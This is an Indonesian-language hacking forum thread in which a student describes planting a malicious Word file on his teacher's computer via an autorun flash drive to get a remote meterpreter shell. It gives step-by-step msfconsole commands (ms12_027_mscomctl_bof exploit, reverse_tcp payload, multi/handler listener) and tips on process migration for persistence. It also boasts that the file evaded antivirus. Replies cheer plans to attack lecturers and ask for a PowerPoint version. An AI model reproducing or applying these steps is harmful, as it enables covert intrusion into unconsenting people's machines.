[computer_geex]

Ckckckck .... kamu nakal -_-

[HambaAllah]

kwekwkwkw =)) buat ngerjain guru sip dah

[kahfiehudson]

ati2 gurunya bales dendam ntar ente di bales hahaha

---

ati2 ntar gurunya bales dendam

[Clound_Carbelius]

apakah semua versi ms.office om yang terkena buffer overlow..?atau versi tahun berapa..?
Nice tuturial om

pertanyaan bagus om :-bd

ini ane test di ms.Word 2007
di coba saja om ke ms2010 / 2013

nanti lapor di mari :d

dan ini payload ane test di Smadav,lolos om dari deteksi virus :d

---

kwekwkwkw =)) buat ngerjain guru sip dah

wkwkw...
ane gak tanggung jawab ah :- =))

[sonyrimawan]

halo semua...
udah lama gw gak update di mari, sibuk skolah

ane mau curhat,sekalian share ilmu nih

Spoiler! :

waktu itu saya ada tugas sekolah,mengunakan Ms.Office Word
semua teman saya sudah memberikan tugas mereka masing-masing lewat flash disk nya

dan saya lagi itu kebetulan tugas nya lupa di copy ke flash disk -_-
idea gila ini datang ketika saya mengetikan "route" pada laptop saya
dan saya melakukan scaning dengan Nmap.ternyata saya dan guru saya berada dalam satu jaringan yang sama

idea saya adalah membuat overlow aplikasi ms.office guru saya,agar dia tak bisa melihat tugas saya.
karna file .doc saya ini bukan ducument sebenar nya,melainkan payload :v

dan saya setting autorun pada flash disk,
sebelum mendatangi meja guru tersebut saya sudah menjalankan Reverse_tcp,dan mendengarkan ip yg masuk ke meterpreter
hanya tinggal menungu korban menjalankan file saya..

dengan bangga saya mengahpiri meja guru itu
dan menyolokan Flash saya sendiri
alhasil aplikasi guru saya itu langsung "Not Responding"
saya beralasan,kalau file tersebut terkena virus
dan minta izin untuk ngumpulin lagi besok

begitu saya kembali ke meja saya,meterpreter terbuka
rencana sih mau di jailin tuh guru
tapi sian ah =)) )

sekian cerita dari saya Clound

tapi bagaimana cara membuat Payload berextension .doc
:-

ketik di msfconsole kalian :

> use exploit/windows/fileformat/ms12_027_mscomctl_bof
> set payload windows/meterpreter/reverse_tcp
> set lhost
> exploit

tahap ini kita hanya baru membuat file payload nya aja
file payload nya berada di folder : /root/.msf4/local/

jika sudah siap semua,
langsung jalankan exploit multi_handler

> use exploit/multi/handler
> set payload windows/meterpreter/reverse_tcp
> set lhost
> exploit

nah,tinggal tungguin aja korban menjalankan payload tersebut



tambahan sedikit,
begitu ms.office "not responding"
biasa nya dia langsung exit dengan sendiri nya,arti nya payload kita juga akan exit

segera lakukan migrate ke aplikasi lain,dengan membaca proses yg di lakukan si target



karna kalau udah migrate,meterpreter kita tak bisa di hentikan,apa lagi klo migrate nya ke prosses system

ok,thank's sekian dari gw Clound

gak nolak di sambit cendol

mantap banget bang. bisa di praktekin ke dosen ane besok dah =))

[Clound_Carbelius]

wkwkw... =))
dosen jdi target embuk =))

mudah"an dosen nya heker,biar bisa nangkis kejailan para mahasiswa nya )

[ino_ot$]

bisa buat pas ane TA besok ni ,, Powerpointnya ane jebak juga bisa kali ya ,,
:v

[Clound_Carbelius]

bisa buat pas ane TA besok ni ,, Powerpointnya ane jebak juga bisa kali ya ,,
:v

payload untuk untuk ppt/pptx ya om :-?
kaya nya ada deh

nanti kalo ane ada waktu,ane share \m/

[wahyuardan]

apakah semua versi ms.office om yang terkena buffer overlow..?atau versi tahun berapa..?
Nice tuturial om

pertanyaan bagus om :-bd

ini ane test di ms.Word 2007
di coba saja om ke ms2010 / 2013

nanti lapor di mari :d

dan ini payload ane test di Smadav,lolos om dari deteksi virus :d

targetnya sih berdasarkan command show targets
ini

Code:

0   Microsoft Office 2007 [no-SP/SP1/SP2/SP3] English on Windows [XP SP3 / 7 SP1] English
   1   Microsoft Office 2010 SP1 English on Windows [XP SP3 / 7 SP1] English

belum coba juga yang office 2010 nanti coba kalau udah masuk sekolah lagi akaka

[shozuoka]

keren om post ny
tp itu korban ny windows xp atau 7 ya ?
Ane exploit win 7 gagal trus